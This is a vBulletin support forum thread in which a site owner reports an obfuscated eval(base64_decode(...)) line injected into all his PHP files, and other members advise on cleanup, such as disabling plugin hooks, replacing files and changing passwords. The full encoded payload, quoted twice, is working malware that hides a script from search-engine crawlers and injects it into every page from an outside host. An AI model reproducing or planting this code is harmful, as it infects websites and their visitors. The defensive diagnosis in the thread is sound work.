Strange code in all my forum files ?

Collapse
X
Collapse
 
  • Page of 1
  • Time
  • Show
Clear All
new posts
Previous template Next
  • Subah
    Senior Member
    • Mar 2007
    • 302
    • 4.1.x
    #1

    Strange code in all my forum files ?

    I just found a strange cade in my all forum files end with .php ?
    how can this be ?
    the code is:
    Code:
    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5a2IyMWhhVzVoYldWaGRDNWpZeTlxY3pJdWNHaHdJajQ4TDNOamNtbHdkRDQ9Iik7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>
    and by the way my forum was not working and its give me white page with un understand langauge like this !!

    ‹ےي}{sظµïكv•؟أ®ŒيDo„dK)اڈdخح$®±srR·n©hDڈپو@K'¹è~ٹ[‰®§1#Yƒ%»|$…ؤ_،ê|„û[ûرh`ةآ©ٌŒMسى÷^{­كzى½ï‎ىل<ûَ“G¬`•ٹىة‎»/°ذb8ü§ّƒpّل³‡ى?~ûى«ك±èR„=«jهڑafY+†أڈ~b،‚eUVأل/^,½ˆ/™صحً³¯أكRYQت,-Oخ¥œ• ­ك¸~ڈ×ک3ھk،ھU ±¢Vق\ iUٌ›®هگوع½ں-.²²ة²Z¶ ³قêص[\ن؟•tKC»­ت¢‏ں[ئِZèIUغ,i!–5ث–^¶ضBes‘ç ±ppژGكVŒھ^َdYŒژLü€±ّ…WM4xd-شf½œ›¼فT$ع»ّىeE÷”kéكZa¥»,[ذھ5فZ{a”sو‹عb4–L‰vقم£PضJْZhS/ëUح2«‍B¶½U,ê–Qfٌ¥ôRLdآè{²=×_¾0«9ï(tOû}»ءژë‎خkِڈ«ں²V§?\eN¯e«F…ˆآS©“پ- s‎Yٌd{‍dپŒ'ہ•آyشٹtf پVdxئ‡ّ²8ًƒ÷‎"¾¨.¢“4‍>eO­—E½VذuKذخ½½`ئ{-ؤ‡9[C÷چـZh;#اkƒ^پjآ؟ّإچë؟`مHإزk^ٍ*»ewvِ؛ح[wإ ِهأU¶Œكأ7®gجـث×ے bخhظç›Us«œ[e7³ù\.ں»‹×Y³hVٌ&ٌ0K? 7yذأ*ثکإ‹F*³´‚Yز0UC+.`·1£Yma[¯و´²FyJZuس(¯²Hه[ï_ْ©¢هrFy“ے†ïےûئumµh”ں/ ٹـث Yù¹hلpShpszض]aژWAشe]²m€è9Uژü:SQ}AWµ¬elëھH‏z†—*ع¦0êڈù_Wï‹YèٹUX`•V4Dn1“خ†vةت`-éص€تُکصùd©ت#ü5GdZeQL_ح,9v3‎ëH"آé؟َi[²²ڑP°Hة¶ھإغF ¯…ُ¢^G oVµœپ‡Zط2¬¢خچ-mù;¬ھWtحZü–Yf…ُ¼هwœf E> h)fSگow‌¹صŒ،3‍e9ش&‹ $·©J”D§*P¤'ث ½ K'90M÷c‘t46~ڑش„mXTبىSEt4غàSE5yوٹ¾ژ‌,o&د¤ˆ|مgإ›ص}Y؟;ü¢¤qمدثة›و§Y ڈ"ڈ"ڈS´>ؤjHOئ“‌Fz—ع|‏àR*?إ‹| ®جê ®üî®(é¼ءصٹVtپ-را}خ‘èYدç#ù„—m‹°hqœè¼o‘xگڈ؛«M¦§ N@#MMuڑ¾‰qُِآں@ô,h:œژxJvI]îے.تٍMڑ;xZàجص¢&Nvا™7Q§÷W§ئہ—¾Œ"é`¤¬کI%‚غمYf‎qے=‍£Yڈù&5و‌uظ 53آ"4ھز7‎¨صے]T2”Lص=‍®چ“†²zد¤Sk4 ›xëنDûfi¼Yœِù2ھوچ£“±چ3تU½d‰?Zخ8‍Q´çہZe/^ضŒ/7'¢8'مTأgP چ«Vص¥—2@ث•-)?f9² fr‎ا-”^ذ¯ˆخPé‹5م/:ک༒#‹y­d_®N*§3[–e–ف"QZج•ٍے.Tپ…û\Gّ­£"
    i just replace the old files with new files and every thing work fine !
    i think this is almost from one of hock`s right ?
    Tags: None
    • beishe8
      Senior Member
      • Oct 2005
      • 6782
      • 4.2.X
      #2
      Originally posted by Subah
      I just found a strange cade in my all forum files end with .php ?
      how can this be ?
      the code is:
      Code:
      <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5a2IyMWhhVzVoYldWaGRDNWpZeTlxY3pJdWNHaHdJajQ4TDNOamNtbHdkRDQ9Iik7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>
      and by the way my forum was not working and its give me white page with un understand langauge like this !!



      i just replace the old files with new files and every thing work fine !
      i think this is almost from one of hock`s right ?
      Probably you have been hacked.

      vB5 is unequivocally the best forum software, but not yet...

        Comment

        • Floris
          Senior Member
          • Dec 2001
          • 37767
          #3
          Someone has compromised your account via MySQL or the web server, or some third party plugin or perhaps your wordpress instance. And used its access to inject malicious code in your .php files so upon execution they can do naughty things. Such as redirect traffic or steal cookies, or whatever it might do.

          Turn off the hook system from the config.php file, turn off your forum. Replace all the vBulletin files and upgrade to the latest 3.8.5 instance if you haven't already. And change your admin and staff passwords after putting admincp/ and modcp/ and includes/ and install/ behind .htaccess/.htpasswd. Change your SFTP/FTP/SSH/MySQL/Cpanel/etc passwords. And go through the directories to find weird .hidden files or directories, or unknown files. vB can help diagnose unknown files.

          If you have third party addons, remove those, or upgrade them to latest builds. And if you have third party software, such as WordPress, make sure it's up to date too. Upgrade those.

          Go through your footer template and see if there are any <iframe> like injections there. Same with header and forumhome, forumdisplay and showthread.

          Run the forum while it's still turned off, and see if it still executes <iframes> or alike that you don't know about, or other code, like the above. And check the files again to see if it already has newly injected stuff.

          Optionally, change hosting provider.

          There are more things you can do, such as checking read/write permissions on files and directories.

          If you feel comfortable enough, from config.php enable the hook system again and see if you get infected again *if not, continue, else, .. you run exploited plugins*.

          Good luck.

          Oh, and don't forget to ask the host to check the server log files to figure out HOW (important: HOW) they got in.

            Comment

            • Subah
              Senior Member
              • Mar 2007
              • 302
              • 4.1.x
              #4
              I just replace all forum file and disaple hocks , everything work fine without enabling the hocks if i enable them i got the same problem !
              i try to enter the product page but i got a page look like there is some thing error there so i can not remove or disable one product ! see the picture below please !




              *click on the picture to see it in big size.

                Comment

                • Floris
                  Senior Member
                  • Dec 2001
                  • 37767
                  #5
                  If you disable hook, and dont have problem
                  and then enable hook, and have the problem.

                  I think it's clear where the culprit is hiding.

                    Comment

                    • Subah
                      Senior Member
                      • Mar 2007
                      • 302
                      • 4.1.x
                      #6
                      Yes but as you see my product page is apper with error !
                      do you know how can i let it run normal ?
                      the picture that you see for my product page while i disable hook !

                        Comment

                        • Subah
                          Senior Member
                          • Mar 2007
                          • 302
                          • 4.1.x
                          #7
                          Ok i do it
                          i just replace the include folder with new folder without any hock file and it is work
                          thank you Floris

                            Comment

                            Previous template Next

                            Related Topics

                            Collapse
                            Working...